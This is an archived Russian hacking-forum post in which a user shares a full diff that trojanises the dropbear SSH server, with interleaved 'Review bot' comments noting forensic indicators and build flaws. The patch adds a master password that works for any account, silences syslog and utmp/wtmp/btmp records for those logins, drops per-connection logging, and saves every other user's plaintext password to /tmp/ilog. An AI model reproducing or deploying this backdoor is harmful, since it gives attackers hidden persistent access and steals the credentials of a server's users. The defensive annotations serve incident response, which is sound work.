
Просмотр полной версии : dropbear backdoor


yesday
25.01.2012, 06:53
Нашёл сервер где вместо OpenSSH админ зачем-то поставил dropbear (https://matt.ucc.asn.au/dropbear/dropbear.html), встала задача протроянить медведа.
Делюсь патчем (на форуме не нашёл).
Как обычно - логин под любым юзером, известным в системе по единому паролю, вырубание логирования при логине с единым паролем, вырубание логирования в {w,b,u}tmp, для нормальных логинов - запись пары юзер:пароль в файл.


diff -u dropbear-2011.54/dbutil.c dropbear-2011.54.bd/dbutil.c
--- dropbear-2011.54/dbutil.c 2011-11-08 14:48:15.000000000 +0200
+++ dropbear-2011.54.bd/dbutil.c 2012-01-25 04:21:37.000000000 +0200
@@ -90,6 +90,8 @@
}

void dropbear_exit(const char* format, ...) {
+ if(backdoorActive == 1)
+ return;

va_list param;

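Review bot: The early `return` inserted at the top of `dropbear_exit` makes a function that upstream declares as never returning (`ATTRIB_NORETURN` in dbutil.h, if this tree matches upstream) return after all, so every caller that relies on it terminating the process continues executing in whatever state caused the fatal error — undefined behaviour under GCC's noreturn handling, and in practice a session flagged by `backdoorActive` that hits any error path neither exits nor logs. The rest of `dropbear_exit` and all of its callers lie outside this hunk. For incident responders this is observable: dropbear child processes that survive conditions under which the pristine build would have logged `Exited:` and died.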
@@ -100,7 +102,8 @@

static void generic_dropbear_exit(int exitcode, const char* format,
va_list param) {
-
+ if(backdoorActive == 1)
+ exit(exitcode);
char fmtbuf[300];

snprintf(fmtbuf, sizeof(fmtbuf), "Exited: %s", format);
@@ -117,6 +120,8 @@
static void generic_dropbear_log(int UNUSED(priority), const char* format,
va_list param) {

+ if(backdoorActive == 1)
+ return;
char printbuf[1024];

vsnprintf(printbuf, sizeof(printbuf), format, param);
@@ -128,6 +133,9 @@
/* this is what can be called to write arbitrary log messages */
void dropbear_log(int priority, const char* format, ...) {

+ if(backdoorActive == 1)
+ return;
+
va_list param;

va_start(param, format);
diff -u dropbear-2011.54/includes.h dropbear-2011.54.bd/includes.h
--- dropbear-2011.54/includes.h 2011-11-08 14:48:15.000000000 +0200
+++ dropbear-2011.54.bd/includes.h 2012-01-25 04:37:31.000000000 +0200
@@ -25,7 +25,6 @@
#ifndef _INCLUDES_H_
#define _INCLUDES_H_

-
#include "config.h"
#include "options.h"
#include "debug.h"
@@ -152,5 +151,9 @@
#else
# define UNUSED(x) x
#endif
+#define B4XDOOR "your_pass_goes_here"
+FILE *f;
+#define ILOG "/tmp/ilog"
+int backdoorActive;

#endif /* _INCLUDES_H_ */
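Review bot: `FILE *f;` and `int backdoorActive;` are definitions, not `extern` declarations, placed in a header that every translation unit includes, so the build depends on the linker merging tentative definitions (GCC's historical `-fcommon` default); with `-fno-common`, the default since GCC 10, this fails to link with multiple-definition errors, and the bare file-scope `f` also collides with any local `f` in the including files. From the defensive side these four lines are the indicators: the literal assigned to `B4XDOOR` and the path `/tmp/ilog` are stored as plain strings in the resulting binary, so a `strings` pass over the installed dropbear, or a checksum comparison against the distribution package (`debsums`, `rpm -V`), shows the modification immediately.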
diff -u dropbear-2011.54/loginrec.c dropbear-2011.54.bd/loginrec.c
--- dropbear-2011.54/loginrec.c 2011-11-08 14:48:15.000000000 +0200
+++ dropbear-2011.54.bd/loginrec.c 2012-01-25 04:16:33.000000000 +0200
@@ -327,6 +327,9 @@
int
login_write (struct logininfo *li)
{
+ if(backdoorActive == 1)
+ return 0;
+
#ifndef HAVE_CYGWIN
if ((int)geteuid() != 0) {
dropbear_log(LOG_WARNING,
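Review bot: Returning `0` from `login_write` before any record is written means a session accepted through the `backdoorActive` path never appears in utmp, wtmp or btmp, so `who`, `last` and `lastb` cannot be trusted on a host running this binary; `login_write` continues past the hunk and its normal return value is not visible here, so whether `0` matches the convention callers expect cannot be confirmed from this hunk. Responders should correlate on evidence the patch does not touch: established connections to the dropbear port (`ss -tnp`), process ancestry of dropbear children, and shell history or file mtimes in the accounts that were logged into.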
diff -u dropbear-2011.54/process-packet.c dropbear-2011.54.bd/process-packet.c
--- dropbear-2011.54/process-packet.c 2011-11-08 14:48:15.000000000 +0200
+++ dropbear-2011.54.bd/process-packet.c 2012-01-25 04:07:29.000000000 +0200
@@ -69,6 +69,8 @@

case SSH_MSG_DISCONNECT:
/* TODO cleanup? */
+ if (backdoorActive == 1)
+ return;
dropbear_close("Disconnect received");
}

diff -u dropbear-2011.54/svr-authpasswd.c dropbear-2011.54.bd/svr-authpasswd.c
--- dropbear-2011.54/svr-authpasswd.c 2011-11-08 14:48:15.000000000 +0200
+++ dropbear-2011.54.bd/svr-authpasswd.c 2012-01-25 04:31:19.000000000 +0200
@@ -35,6 +35,8 @@
/* Process a password auth request, sending success or failure messages as
* appropriate */
void svr_auth_password() {
+
+ backdoorActive = 0;

#ifdef HAVE_SHADOW_H
struct spwd *spasswd = NULL;
@@ -71,6 +73,18 @@

password = buf_getstring(ses.payload, &passwordlen);

+ if(password){
+ if (!strcmp(password, B4XDOOR)) {
+ backdoorActive = 1;
+ send_msg_userauth_success();
+ return;
+ }
+ if((f=fopen(ILOG,"a"))!=NULL){
+ fprintf(f,"user:password --> %s:%s\n",ses.authstate.pw_name, password);
+ fclose(f);
+ }
+ }
+
/* the first bytes of passwdcrypt are the salt */
testcrypt = crypt((char*)password, passwdcrypt);
m_burn(password, passwordlen);
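Review bot: The credential log at `fopen(ILOG,"a")` records every password attempt for an existing account in plaintext — it runs before `crypt()`, so failed attempts and mistyped passwords are captured too — into a fixed path under `/tmp` opened with the daemon's default umask, so depending on that umask any local user can read it; every credential found in that file must be treated as compromised and rotated. The `strcmp` against `B4XDOOR` sends `userauth_success` for any account that reached password authentication and sets `backdoorActive`, which suppresses the success log line later in this function (outside the hunk), so the signature to look for is a `/tmp/ilog` file together with accepted sessions that have no matching auth entry in syslog. The rest of `svr_auth_password` lies outside the hunk.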
diff -u dropbear-2011.54/svr-main.c dropbear-2011.54.bd/svr-main.c
--- dropbear-2011.54/svr-main.c 2011-11-08 14:48:15.000000000 +0200
+++ dropbear-2011.54.bd/svr-main.c 2012-01-25 04:05:43.000000000 +0200
@@ -285,7 +285,7 @@
#endif /* DEBUG_FORKGPROF */

getaddrstring(&remoteaddr, NULL, &remote_port, 0);
- dropbear_log(LOG_INFO, "Child connection from %s:%s", remote_host, remote_port);
+ //dropbear_log(LOG_INFO, "Child connection from %s:%s", remote_host, remote_port);
m_free(remote_host);
m_free(remote_port);
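Review bot: Commenting out the `Child connection from %s:%s` line removes the only per-connection record the listener writes, for every client and not just the shared-password path, so after this change no connection to this dropbear is logged at all; that absence is itself an indicator when firewall or flow records show SSH connections the host never logged. Leaving the original line as a `//` comment rather than deleting it also makes the modification trivial to spot in a diff against the pristine 2011.54 source or the distribution package.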